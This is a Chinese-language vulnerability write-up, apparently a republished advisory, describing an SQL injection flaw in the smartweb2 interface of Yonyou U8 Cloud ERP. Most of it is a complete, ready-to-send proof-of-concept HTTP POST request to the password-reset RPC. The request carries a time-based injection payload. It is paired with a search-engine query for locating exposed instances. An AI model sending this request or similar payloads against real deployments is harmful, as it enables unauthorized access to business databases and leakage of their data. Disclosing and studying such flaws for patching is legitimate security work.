登录 白背景

用友U8 Cloud smartweb2存在SQL注入漏洞

一、漏洞简介

用友U8 Cloud是用友公司推出的企业上云数字化平台,为成长型和创新型企业提供全面的云ERP解决方案。然而,该平台中存在一个安全漏洞,涉及smartweb2接口对用户输入参数缺乏有效过滤,可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库,造成潜在的信息泄露风险。建议尽快修复漏洞,强化输入验证,提升系统安全性。

二、影响版本

  • 用友U8 Cloud

三、资产测绘

  • hunterapp.name="用友 U8 Cloud"

image.png

  • 登录页面

image.png

四、漏洞复现

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Cookie: JSESSIONID=C2CFFE1429FF812ABF357C2BDD5BDBC1.server; JSESSIONID=8FEF31DBA1E3188706B14123C6D1CE87.server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 672

__type=updateData&__viewInstanceId=nc.bs.hrss.login.ResetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=<rpc transaction="10" method="resetPwd"><def><dataset type="Custom" id="dsResetPwd"><f name="user"></f><f name="ID"></f></dataset></def><data><rs dataset="dsResetPwd"><r id="10009" state="insert"><n><v>1';WAITFOR DELAY '0:0:6'--</v><v>11111111111111111111</v></n></r></rs></data><vps><p name="__profileKeys">findPwd%3B15b021628b8411d33569071324dc1b37</p></vps></rpc>&1700109885028

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/vaycvrn8dchgb0ql